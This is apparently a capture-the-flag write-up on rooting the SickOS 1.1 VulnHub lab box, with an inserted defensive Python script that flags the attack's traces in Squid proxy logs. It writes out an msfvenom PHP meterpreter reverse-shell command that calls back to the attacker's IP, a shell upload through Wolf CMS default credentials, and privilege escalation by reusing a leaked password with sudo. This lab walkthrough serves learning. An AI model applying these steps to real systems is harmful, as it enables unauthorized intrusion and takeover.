SickOS

I hacked the SickOS VM from vulnhub.com. Here is how I did it.

I started by running an nmap scan against the box.

There is a Squid instance running on the box.
Squid is a proxy server, so let's configure our browser to go through the proxy.
Once you set the proxy, you can browse to the real website at http://192.168.101.229/ . This works because the website is not open from the outside; by using the box's own proxy we can reach the web server.

http://192.168.101.229/robots.txt
In robots.txt there is an entry called /wolfcms/.
Naturally, we check on Exploit-DB whether there is a vulnerable version that would help us attack the system.
Exploit-DB Exploit
From there I saw the path to the admin web panel.
"GET {$path}/?/admin/plugin/file_manager HTTP/1.1\r\n";
So we browse to http://192.168.101.229/wolfcms/?/admin/
We are presented with a login page.
I googled the default password for Wolf CMS, which is admin // admin.
In the web application there is a way to upload a file.

Let's generate a PHP meterpreter payload so that we have shell access on the system.

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.101.3 LPORT=443 -o phpmeter.php

If we upload phpmeter.php,
we can fetch it using http://192.168.101.229/public/phpmeter.php
This gives us a reverse shell as www-data.
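
As an added example (not part of the original post): every request above goes through Squid, so its access.log records the proxy being used to reach the host's own web server, the Wolf CMS file manager request, and the later fetch of a PHP file under /public/. The sketch below flags those three patterns; the log lines are constructed samples in Squid's native format, and PROXY_OWN_ADDRS is an assumed setting.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumption: addresses owned by the proxy host itself (the VM's IP in this post).
PROXY_OWN_ADDRS = {"192.168.101.229"}

# Constructed sample lines in Squid's native access.log format.
SAMPLE_LOG = """\
1449500000.101     12 192.168.101.3 TCP_MISS/200 512 GET http://192.168.101.229/robots.txt - HIER_DIRECT/192.168.101.229 text/plain
1449500020.450     30 192.168.101.3 TCP_MISS/200 4096 GET http://192.168.101.229/wolfcms/?/admin/plugin/file_manager - HIER_DIRECT/192.168.101.229 text/html
1449500031.007     25 192.168.101.3 TCP_MISS/200 0 GET http://192.168.101.229/public/phpmeter.php - HIER_DIRECT/192.168.101.229 text/html
1449500040.300     80 192.168.101.7 TCP_MISS/200 9000 GET http://example.org/index.html - HIER_DIRECT/203.0.113.10 text/html
"""

def is_self_target(host):
    """True when the proxied destination is the proxy host itself or loopback."""
    if host in PROXY_OWN_ADDRS or host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False  # a hostname, not an IP literal

def analyze(log_text):
    """Return (line_no, client, reason, url) tuples for suspicious entries."""
    findings = []
    used_file_manager = set()  # clients already seen on the file manager plugin
    for n, line in enumerate(log_text.splitlines(), 1):
        f = line.split()
        if len(f) < 7:
            continue  # skip malformed or truncated lines
        client, method, url = f[2], f[5], f[6]
        # CONNECT entries log "host:port" with no scheme; normalise before parsing.
        parts = urlsplit(url if "://" in url else "//" + url)
        if not is_self_target(parts.hostname or ""):
            continue
        findings.append((n, client, "proxy-to-self", url))
        if "/admin/plugin/file_manager" in url:
            used_file_manager.add(client)
            findings.append((n, client, "cms-file-manager", url))
        elif (method == "GET" and "/public/" in parts.path
              and parts.path.endswith(".php") and client in used_file_manager):
            findings.append((n, client, "php-fetch-after-upload", url))
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(*finding)
```
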

python -c 'import pty;pty.spawn("/bin/bash")'

From this shell we can read the configuration of the web server, including the root password for MySQL.
In /var/www/wolfcms/config.php we can see the database configuration:

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

So the root password for the database is john@123
By doing some enumeration on the system we can see there is an additional user named sickos; we can read the file at /etc/passwd or ls /home/
People tend to reuse their passwords, so we can try to log in as the sickos user:
su sickos and password john@123
Since the person who created this VM wasn't careful about security, sickos is the default account he created, and by default the main account is a member of sudoers.
This means we can run any command as root on the system.
We can verify that we are in the sudoers group with this command:

sudo -l

User sickos may run the following commands on this host:
(ALL : ALL) ALL

This means we can switch user and log in as the root account with the password john@123
Run sudo su to get a shell as root!

cat /root/a0216ea4d51874464078c618298b1367.txt

'If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying
